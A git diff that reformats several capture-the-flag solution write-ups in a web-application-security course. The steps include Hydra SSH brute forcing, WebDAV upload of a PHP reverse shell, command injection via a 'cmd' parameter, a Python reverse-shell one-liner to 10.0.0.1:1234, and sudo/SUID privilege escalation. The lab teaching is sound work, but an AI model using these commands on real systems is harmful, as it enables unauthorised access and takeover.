open-education-hub
diff --git a/‎chapters/web-application-security/10-end-to-end/drills/bounty-hacker/sol/index.md‎
Lines changed: 8 additions & 4 deletions b/‎chapters/web-application-security/10-end-to-end/drills/bounty-hacker/sol/index.md‎
Lines changed: 8 additions & 4 deletions
diff --git a/‎chapters/web-application-security/10-end-to-end/drills/brooklyn-nine-nine/sol/index.md‎
Lines changed: 16 additions & 6 deletions b/‎chapters/web-application-security/10-end-to-end/drills/brooklyn-nine-nine/sol/index.md‎
Lines changed: 16 additions & 6 deletions
diff --git a/‎chapters/web-application-security/10-end-to-end/drills/dav/sol/index.md‎
Lines changed: 14 additions & 5 deletions b/‎chapters/web-application-security/10-end-to-end/drills/dav/sol/index.md‎
Lines changed: 14 additions & 5 deletions
diff --git a/‎chapters/web-application-security/10-end-to-end/drills/jack-of-all-trades/sol/index.md‎
Lines changed: 68 additions & 30 deletions b/‎chapters/web-application-security/10-end-to-end/drills/jack-of-all-trades/sol/index.md‎
Lines changed: 68 additions & 30 deletions
@@ -18,11 +18,12 @@
 
 ![2](images/ftp_login.jpg?raw=true "Ftp_login")
 
-+ **Listing the directory, we can observe two .txt files uploaded so let's get them**
++ **Listing the directory, we can observe two `.txt` files uploaded so let's get them**
 
 ``mget *.txt``
 
-+ **Reading the task.txt file, we can find out who wrote the task list, giving us the first task answer. We list the second txt file, named locks.txt, and we can see multiple strings which seems to be some passwords kept in the ftp server**
++ **Reading the `task.txt` file, we can find out who wrote the task list, giving us the first task answer.**
+**We list the second txt file, named `locks.txt`, and we can see multiple strings which seems to be some passwords kept in the ftp server.**
 
 ```text
 rEddrAGON
@@ -39,9 +40,12 @@ R3dDRaG0Nsynd1c@T3
 ...
 ```
 
-+ **Let's try to use this password file to connect on the ssh service, using simultaneously the user found in the previous task. The Hydra tool has a brute-force option to crack the login of the ssh service, so we can use it**
++ **Let's try to use this password file to connect on the ssh service, using simultaneously the user found in the previous task.**
+**The Hydra tool has a brute-force option to crack the login of the ssh service, so we can use it**
 
-``hydra -l lin -P locks.txt 10.10.229.13 -t 4 ssh``
+```console
+hydra -l lin -P locks.txt 10.10.229.13 -t 4 ssh
+```
 
 + **After we execute the brute-force process, Hydra give us the needed user password**
 
 
@@ -22,32 +22,42 @@
 
 ![2](images/ftp.jpg)
 
-**We successfully connected and we can see a** note_to_jake.txt **file inside the ftp server. We can get that file and read it**
+**We successfully connected and we can see a** `note_to_jake.txt` **file inside the ftp server.**
+**We can get that file and read it**
 
 ``get note_to_jake.txt``
 ![3](images/change_password.jpg)
 
-+ **Looks that Jake need to change his password. Because jake is using a very weak password, maybe we can brute-force his login to some service. Let's use hydra to brute-force the ssh service - I'm using the rockyou.txt wordlist**
++ **Looks that Jake need to change his password.**
+**Because jake is using a very weak password, maybe we can brute-force his login to some service.**
+**Let's use hydra to brute-force the ssh service - I'm using the `rockyou.txt` wordlist**
 
-``hydra -l jake -P /usr/share/wordlists/rockyou.txt 10.10.244.52 -t 4 ssh``
+```console
+hydra -l jake -P /usr/share/wordlists/rockyou.txt 10.10.244.52 -t 4 ssh
+```
 
 ![4](images/hydra.jpg)
 
 ## User escalation
 
-+ **So here we got some ssh credentials. Let's connect on the ssh service and run a** ``sudo -l`` **command on the jake user**
++ **So here we got some ssh credentials.**
+**Let's connect on the ssh service and run a** ``sudo -l`` **command on the jake user**
 
 ![5](images/less.jpg)
 
-**It looks like jake can run the less command with su privilege. Less is a command which can display content of a file and we can navigate both forward and backward through the file. Let's try to read the user flag.**
+**It looks like jake can run the less command with su privilege.**
+**Less is a command which can display content of a file and we can navigate both forward and backward through the file.**
+**Let's try to read the user flag.**
 
 ``sudo less /home/holt/user.txt``
 
 [6](images/user_flag_1.jpg)
 
 ## Root escalation
 
-+ **And here it is our first flag. We can also use less to get a privesc and get root access. Let's read a file with less**
++ **And here it is our first flag.**
+**We can also use less to get a privesc and get root access.**
+**Let's read a file with less**
 
 ``less /etc/passwd``
 
 
@@ -22,7 +22,8 @@
 
 ![dirb](images/nmap_dirb_scan2.jpg?raw=true "dirb")
 
-**Navigating to the /webdav directory, the login page shows up. We need some credentials, and searching on google we can find some.**
+**Navigating to the /webdav directory, the login page shows up.**
+**We need some credentials, and searching on google we can find some.**
 
 [login](images/login.png?raw=true "login")
 
@@ -34,15 +35,20 @@
 
 [webdav](images/webdav.jpg?raw=true "webdav")
 
-+ **Reading the file, it seems to be some credentials with a hashed password. Trying to unhashed it, i realised it's nothing that we can do with it so i continued to read about WebDAV service. It has some similarities with the ftp, among with the cadaver: we can upload some files in that /webdav directory. Let's login with the cadaver, the WebDAV client, using the same default credentials**
++ **Reading the file, it seems to be some credentials with a hashed password.**
+**Trying to unhashed it, i realised it's nothing that we can do with it so i continued to read about WebDAV service.**
+**It has some similarities with the ftp, among with the cadaver: we can upload some files in that /webdav directory.**
+**Let's login with the cadaver, the WebDAV client, using the same default credentials**
 
 ``cadaver http://10.10.62.166/webdav/``
 
 ``Username: wampp``
 
 ``Password: xampp``
 
-+ **Now, let's try to upload a reverse php shell. I use the [pentestmonkey reverse shell](https://github.com/pentestmonkey/php-reverse-shell). Get it and modify the $ip parameter with your tryhackme tunneled ip and then upload it on our webdav directory**
++ **Now, let's try to upload a reverse php shell.**
+**I use the [pentestmonkey reverse shell](https://github.com/pentestmonkey/php-reverse-shell).**
+**Get it and modify the $ip parameter with your tryhackme tunneled ip and then upload it on our webdav directory**
 
 ``put php-reverse-shell.php``
 
@@ -60,9 +66,12 @@
 
 ## User escalation
 
-**And we're in. Let's spawn an interactive shell and read our first flag, located inside the home directory of the merlin user.**
+**And we're in.**
+**Let's spawn an interactive shell and read our first flag, located inside the home directory of the merlin user.**
 
-``python -c 'import pty;pty.spawn("/bin/bash")'``
+```console
+python -c 'import pty;pty.spawn("/bin/bash")'
+```
 
 ![in](images/usermer.jpg)
 
 
@@ -12,37 +12,45 @@
 
 ``nmap -sV -sC -oN scan1 10.10.252.248``
 
-+ **We can see 2 open ports with some services: ssh and http. The first strange thing is that the services are opened on reversed ports. Ssh is opened on the 80 ports and http on the 22 one**
++ **We can see 2 open ports with some services: ssh and http.**
+**The first strange thing is that the services are opened on reversed ports.**
+**Ssh is opened on the 80 ports and http on the 22 one**
 
 ![1](images/nmap_scan_jack.jpg?raw=true "Nmap_scan")
 
-+ **Let's try to get to the http web-site on the 22 port. We see an browser error: seems like Firefox has canceled our request for kind of security. That's because the unusual use of 22 port for the http service**
++ **Let's try to get to the http web-site on the 22 port.**
+**We see an browser error: seems like Firefox has canceled our request for kind of security.**
+**That's because the unusual use of 22 port for the http service**
 
 ![2](images/restrict.jpg?raw=true "restrict")
 
-**We can allow this restricted port making some configuration inside the mozilla browser: [allow restricted ports](https://support.mozilla.org/en-US/questions/1083282#answer-780274). Go into the about:config page in the url, search for the ports and add the network.security.ports.banned.override string, with the 22 value**
+**We can allow this restricted port making some configuration inside the mozilla browser: [allow restricted ports](https://support.mozilla.org/en-US/questions/1083282#answer-780274).**
+**Go into the about:config page in the URL, search for the ports and add the `network.security.ports.banned.override` string, with the 22 value.**
 
 ![3](images/add_string.png?raw=true "add_string")
 
 ![4](images/welcome.png?raw=true "welcome")
 
-**We can see our main page, with the box title and some images in there. Let's scan with gobuster too.**
+**We can see our main page, with the box title and some images in there.**
+**Let's scan with gobuster too.**
 
 ``gobuster dir -u http://10.10.252.248:22/ -w /usr/share/wordlists/dirb/common.txt``
 
 ![5](images/gobust.jpg?raw=true "gobust")
 
-+ **Let's take a look into our gobuster output. Let's visit the assets page; we can see some *jpg* files, one of them called** stego.jpg **so we can think about an encrypted image with the help of steganography**
++ **Let's take a look into our gobuster output.**
+**Let's visit the assets page; we can see some *jpg* files, one of them called** `stego.jpg` **so we can think about an encrypted image with the help of steganography**
 
 ![6](images/assets.jpg?raw=true "assets")
 
 + **We can try to extract the stego image to see de hidden data, so we're gonna use steghide**
 
 ``steghide --extract -sf stego.jpg``
 
-**A passphrase is requested, so we cannot immediately decrypt the image, but we can continue to enumerate the http page. Let's take a look into the source code of the page.**
+**A passphrase is requested, so we cannot immediately decrypt the image, but we can continue to enumerate the http page.**
+**Let's take a look into the source code of the page.**
 
-+ **We can spot a message left in the source code of the page: a recovery message which tells us we can connect on the /recovery.php page and there's also a base64 encoded message**
++ **We can spot a message left in the source code of the page: a recovery message which tells us we can connect on the `/recovery.php` page and there's also a base64 encoded message**
 
 ![7](images/base64.jpg?raw=true "base64")
 
@@ -52,49 +60,62 @@
 
 ![8](images/decrypt.jpg?raw=true "base64")
 
-**We got a message and a password too! Let's use it to decrypt the image with steghide.**
+**We got a message and a password too!**
+**Let's use it to decrypt the image with steghide.**
 
 ![9](images/first_steg.jpg?raw=true "first_steg")
 
-+ **A creds.txt file was hidden inside, but the stego.jpg wasn't the good path. Let's download the other images from the assets page and extract them**
++ **A `creds.txt` file was hidden inside, but the `stego.jpg` wasn't the good path.**
+**Let's download the other images from the assets page and extract them**
 
 ![10](images/real_steg.jpg?raw=true "real_steg")
 
 ``steghide --extract -sf header.jpg``
 
-**Bingo! We got a username and a password inside the header.jpg image. Let's go to the /recovery.php page and try to login with the credentials.**
+**Bingo! We got a username and a password inside the `header.jpg` image.**
+**Let's go to the `/recovery.php` page and try to login with the credentials.**
 
 + **Logging in with our credentials on the page, we are redirected to a page with the message:**
 
 ``GET me a 'cmd' and I'll run it for you Future-Jack.``
 
 ![11](images/login.jpg?raw=true "login")
 
-**Now, let's try some system commands inside the url:**
+**Now, let's try some system commands inside the URL:**
 
 ``http://10.10.252.248:22/nnxhweOV/index.php?cmd=cat /etc/passwd``
 
 ![cmd](images/cmdworks.jpg?raw=true "cmd")
 
-+ **It's all working, so go grab a reverse shell. I'm gonna use python and start listen with nc**
++ **It's all working, so go grab a reverse shell.**
+**I'm gonna use python and start listen with nc**
 
-``nc -lvnp 1234``
+```console
+nc -lvnp 1234
+```
 
-``http://10.10.252.248:22/nnxhweOV/index.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'``
+```text
+http://10.10.252.248:22/nnxhweOV/index.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
+```
 
 ![12](images/access.jpg?raw=true "access")
 
 ## User escalation
 
-**Here we got our access into the system. Let's spawn an interactive shell with python and continue to enumerate.**
+**Here we got our access into the system.**
+**Let's spawn an interactive shell with python and continue to enumerate.**
 
-``python -c 'import pty; pty.spawn("/bin/bash")'``
+```console
+python -c 'import pty; pty.spawn("/bin/bash")'
+```
 
-+ **Looking into the /home directory, we can see a** ``jacks_password_list`` **file which seems to be a password list for the jake user. According to the second service opened, on the 80 port, the ssh service, we're gonna try to bruteforce the login with the given wordlist and with the help of the Hydra tool**
++ **Looking into the /home directory, we can see a** ``jacks_password_list`` **file which seems to be a password list for the jake user.**
+**According to the second service opened, on the 80 port, the ssh service, we're gonna try to bruteforce the login with the given wordlist and with the help of the Hydra tool**
 
 ![13](images/jackspassw.jpg?raw=true "jacks")
 
-+ **Firstly, we need to download the** ``jacks_password_list`` **file to our machine. Open a python server on the Jack box and we're gonna get the file on ours**
++ **Firstly, we need to download the** ``jacks_password_list`` **file to our machine.**
+**Open a python server on the Jack box and we're gonna get the file on ours**
 
 **The Jack box:**
 
@@ -104,44 +125,61 @@
 
 **``{kali@kali:Jack of All Trades_0}$``** ``wget 10.10.252.248:6999/jacks_password_list``
 
-+ **Now, having the wordlist, let's start the bruteforce phase. Don't forget to set the port for the ssh service, because it's not on the default (22), but the 80 one**
++ **Now, having the wordlist, let's start the bruteforce phase.**
+**Don't forget to set the port for the ssh service, because it's not on the default (22), but the 80 one**
 
-``hydra -s 80 -v -V -l jack -P jacks_password_list -t 8 10.10.252.248  ssh``
+```console
+hydra -s 80 -v -V -l jack -P jacks_password_list -t 8 10.10.252.248  ssh
+```
 
 ![13](images/hydra.jpg?raw=true "hydra")
 
 **Let's connect into the ssh server with our credentials on the 80 port.**
 
-``ssh jake@10.10.252.248 -p 80``
+```console
+ssh jake@10.10.252.248 -p 80
+```
 
-+ **In the /home/jack directory we can see the user flag, but in the .jpg format. Let's get the image on our machine, using the same method as above, and then open it**
++ **In the /home/jack directory we can see the user flag, but in the .jpg format.**
+**Let's get the image on our machine, using the same method as above, and then open it**
 
-**``www-data@jack-of-all-trades:/home$``** ``python -m SimpleHTTPServer 6999``
+```console
+www-data@jack-of-all-trades:/home$ python -m SimpleHTTPServer 6999
+```
 
-**``{kali@kali:Jack of All Trades_0}$``** ``wget 10.10.252.248:6999/user.jpg``
+```console
+{kali@kali:Jack of All Trades_0}$ wget 10.10.252.248:6999/user.jpg
+```
 
 **Opening the user.jpg flag, we can see the Penguing recipe and the user flag.**
 
 ![14](images/user.flag.jpg?raw=true "user")
 
 ## Root escalation
 
-+ **Checking for ``sudo -l`` on the jack user gives us no good path. He has no sudo permission on the machine**
++ **Checking for ``sudo -l`` on the jack user gives us no good path.**
+**He has no `sudo` permission on the machine**
 
 ``Sorry, user jack may not run sudo on jack-of-all-trades.``
 
 **Let's check for some advanced linux file permissions - suid.**
 
-``find / -type f -user root -perm -4000 -print 2>/dev/null``
+```console
+find / -type f -user root -perm -4000 -print 2>/dev/null
+```
 
-+ **This gives us some interesting output. The strings executable has got file owner permission when executing a command**
++ **This gives us some interesting output.**
+**The strings executable has got file owner permission when executing a command**
 
 ![15](images/suid.jpg?raw=true "suid")
 
-**Knowing this, let's try to use strings on our root.txt flag.**
+**Knowing this, let's try to use strings on our `root.txt` flag.**
 
-``strings /root/root.txt``
+```console
+strings /root/root.txt
+```
 
-+ **And here's our root flag. This was a very nice box with some steganography challenges into, a reversed ports configuration of services and some file permissions**
++ **And here's our root flag.**
+**This was a very nice box with some steganography challenges into, a reversed ports configuration of services and some file permissions**
 
 ![15](images/root_flag_jack.jpg?raw=true "suid")